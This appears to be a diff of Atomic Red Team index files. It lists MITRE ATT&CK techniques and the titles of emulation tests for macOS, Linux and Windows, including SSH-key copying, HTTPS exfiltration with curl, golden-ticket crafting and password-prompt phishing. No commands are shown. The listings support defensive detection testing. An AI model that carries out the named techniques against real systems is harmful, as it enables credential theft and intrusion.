- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
@@ -485,86 +371,148 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- [T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# credential-access
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.001 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+403 -764
View File
@@ -1,198 +1,10 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1003.006 DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
